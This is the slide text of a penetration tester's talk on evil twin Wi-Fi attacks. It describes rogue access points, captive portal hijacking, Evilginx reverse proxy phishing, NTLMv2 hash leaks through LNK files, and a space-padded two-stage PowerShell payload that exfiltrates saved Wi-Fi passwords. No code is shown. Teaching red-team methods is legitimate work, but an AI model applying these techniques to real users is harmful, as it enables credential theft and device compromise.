Evil Twin Techniques For Real World Exploitation

Transcript

1. Evil Twin Techniques For Real World Exploitation

2. About Me • Harold Rodriguez “superkojiman” • Penetration tester, red

   team operator, security researcher • Hacking the planet since ~2010

3. Today’s Talk • The “what” and “how” of evil twin

   attacks • Demonstrate attacks for real world exploitation • Walkthrough on how to setup the attacks on your own

4. A rogue access point impersonating a trusted network to lure

   a station (laptop, smartphone, IoT devices, etc) into connecting to it. Evil-What Now?

5. How It Works A station that connects to a Wi-Fi

   network can store the network’s SSID so it can connect to it again automatically when it comes back into range. When out of range of a trusted Wi-Fi network, the station will do one of two things: • Actively scan for a known SSID • Passively listen for access points broadcasting a known SSID

6. Active Scanning Station actively sends probe request frames to nearby

   access points, searching if any match SSIDs it previously connected to. If it finds one it connects to it.

7. Passive Scanning Station passively listens for beacon frames broadcast by

   access points that contain an SSID the station previously connected to. If it receives one it connects to it.

8. The Attack If an attacker knows an SSID the station

   trusts, they can broadcast that SSID and trick the station to connecting to it.

9. Attacker can control what a user sees using a captive

   portal.

10. Captive Portals Displayed after a station connects to a Wi-Fi

    network, but before it has Internet access. Purpose: • Require user to accept terms and conditions • Require payment for Internet access • Require user to provide authentication

11. Captive Portal Demo

12. How does Windows know when a captive portal is required?

13. No Captive Portal

14. Captive Portal Required

15. Exploiting The Captive Portal

16. Let’s explore some attack scenarios.

17. Attack Scenario Target: • Alice • Works at Whistler, Turnbull

    & Fisher Corp. • Email: [email protected] Device: • Windows 11 Pro 24H2 • Defender antivirus updated August 21, 2025 • Trusts open Wi-Fi network WTFCorp_Guest

18. Fake Login Page Demo The classic evil twin phishing payload

19. Every evil twin tutorial… GIVE ME YOUR PASSWORD

20. None

21. Reverse Proxy Phishing Demo Get around pesky Multi-Factor Authentication

22. Drive By Download Demo Force browser to download malicious files

23. User-Assisted Code Execution Demo Trick user into entering malicious commands

24. Questions?

25. Evil Twin Setup

26. Software And Hardware Software • Linux (Kali, Ubuntu, etc) •

    hostapd • dnsmasq • Web server (lighttpd, nginx, apache) Hardware • Portable computer (laptop, Raspberry Pi) • Power bank • Wi-Fi adapter

27. Raspberry Pi evil twin setup

28. Enables the wireless interface wlan1 to act as an access

    point. This will broadcast the SSID the station trusts to trick it into connecting to the Pi. hostapd

29. dnsmasq Assign an IP address to the station and overwrite

    DNS settings for msftconnecttest.com so it goes to the web server running on the Pi.

30. lighttpd Create a file connecttest.txt in the web root with

    any content other than “Microsoft Connect Test”. This will force Windows to trigger the captive portal flow.

31. lighttpd Rewrite rule that redirects requests to http://msftconnecttest.com/redirect to the

    captive portal landing page at http://10.11.12.1/index.html

32. lighttpd Captive portal landing page serves attacker payload to the

    browser; either fake login page hosted on the evil twin, or elsewhere on the Internet.

33. IP Forwarding • The Pi’s primary wireless interface (wlan0) is

    connected to the Internet • Forward connections from wlan1 to wlan0

34. Evil twin in action

35. The Payloads

36. Reverse Proxy Phishing • Set up an Evilginx server with

    a domain that looks trustworthy • Configure an Evilginx phishlet and create a lure

37. Reverse Proxy Phishing • Set the captive portal landing page

    to redirect the user to the lure

38. Drive By Download • Create a LNK file pointing to

    the IP address of the Pi, and package it into a ZIP archive • ZIP extraction triggers SMB-based NTLMv2 hash leak to the Pi

39. Drive By Download Captive portal page redirects to download.html download.html

    redirects to the ZIP archive

40. Drive By Download Some observations using the default configuration of

    Edge, Chrome, and Firefox. HTTPS 🔒 • Edge, Chrome, and Firefox will download the file automatically HTTP 🔓 • Edge and Firefox will download the file automatically • Chrome will ask for additional confirmation from the user

41. User-Assisted Code Execution The Run dialog is limited to 259

    characters, so a two-stage payload is required • Stage 1 is copied to the clipboard and is a Powershell command to download the Stage 2 payload from the Pi

42. User-Assisted Code Execution Stage 1 payload can be padded with

    spaces to hide the payload when the user pastes it into the Run dialog.

43. Stage 2 payload uses netsh to retrieve saved SSIDs and

    passwords, and sends them to the Pi. User-Assisted Code Execution

44. User-Assisted Code Execution Simple Flask server waiting to receive the

    SSID and passwords.

45. Thank You